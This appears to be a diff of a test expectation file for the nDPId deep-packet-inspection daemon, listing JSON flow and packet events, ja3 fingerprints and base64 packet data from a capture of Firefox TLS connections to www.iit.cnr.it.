{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":646,"flow_first_seen":1620927999111,"flow_last_seen":1620927999879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":545091,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":878,"flow_first_seen":1620927999112,"flow_last_seen":1620927999897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":744373,"flow_avg_l4_payload_len":847,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927997754,"flow_last_seen":1620927997754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927997754,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620927997754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927997754,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl5AbuZmizAAAAAALAC\/\/9OVwAAAgQFtAEDAwUBAQgKNAyUbQAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620927997781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927997781,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yXkJiZGFmZoswaAS\/oiCawAAAgQFrAQCCAo8IAcuNAyUbQEDAwc="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620927997781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927997781,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl5AbuZmizBCYmRhoAQECyfcgAAAQEICjQMlIc8IAcu"} +00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927997754,"flow_last_seen":1620927997782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620927997782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927997754,"flow_last_seen":1620927997814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620927997814,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998782,"flow_last_seen":1620927998782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927998782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620927998782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927998782,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl\/AbveSGQcAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKNAyYZQAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998806,"flow_last_seen":1620927998806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927998806,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620927998806,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927998806,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmEAbtCftk8AAAAALAC\/\/\/03wAAAgQFtAEDAwUBAQgKNAyYeQAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620927998817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927998817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yX\/JSxfE3khkHaAS\/oi4VgAAAgQFrAQCCAo8IAs5NAyYZQEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620927998817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927998817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl\/AbveSGQdyUsXxYAQECzVWgAAAQEICjQMmII8IAs5"} 
+00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998782,"flow_last_seen":1620927998820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998820,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620927998833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927998833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yYRFBnlrQn7ZPaAS\/ogBdQAAAgQFrAQCCAo8IAtKNAyYeQEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620927998833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927998833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmEAbtCftk9RQZ5bIAQECwefwAAAQEICjQMmJA8IAtK"} 
+00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998806,"flow_last_seen":1620927998850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998782,"flow_last_seen":1620927998850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998806,"flow_last_seen":1620927998877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998877,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999109,"flow_last_seen":1620927999109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999109,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620927999109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999109,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmPAbugsPXqAAAAALAC\/\/947AAAAgQFtAEDAwUBAQgKNAyZgQAAAAAEAgAA"} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999111,"flow_last_seen":1620927999111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999111,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1620927999111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999111,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmQAbsCvXBwAAAAALAC\/\/+cWAAAAgQFtAEDAwUBAQgKNAyZggAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999112,"flow_last_seen":1620927999112,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999112,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1620927999112,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999112,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmRAbvLRPiuAAAAALAC\/\/9LkAAAAgQFtAEDAwUBAQgKNAyZgwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1620927999138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999138,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yY9yeaT2oLD166AS\/ogrVAAAAgQFrAQCCAo8IAx5NAyZgQEDAwc="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1620927999138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999138,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yZBJLtVRAr1wcaAS\/ohHrwAAAgQFrAQCCAo8IAx6NAyZggEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1620927999138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999138,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmPAbugsPXrcnmk94AQECxIWgAAAQEICjQMmZw8IAx5"} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620927999138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999138,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmQAbsCvXBxSS7VUoAQECxktgAAAQEICjQMmZw8IAx6"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620927999140,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999140,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yZFyBGfZy0T4r6AS\/og7hgAAAgQFrAQCCAo8IAx9NAyZgwEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620927999140,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999140,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmRAbvLRPivcgRn2oAQECxYiwAAAQEICjQMmZ88IAx9"} +00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999111,"flow_last_seen":1620927999141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999141,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999109,"flow_last_seen":1620927999143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999143,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999112,"flow_last_seen":1620927999148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999148,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":156,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999111,"flow_last_seen":1620927999169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999169,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999109,"flow_last_seen":1620927999170,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999170,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999112,"flow_last_seen":1620927999179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999179,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1065,"flow_first_seen":1620927997754,"flow_last_seen":1620927999853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":891202,"flow_avg_l4_payload_len":836,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1031,"flow_first_seen":1620927998782,"flow_last_seen":1620927999948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":869503,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 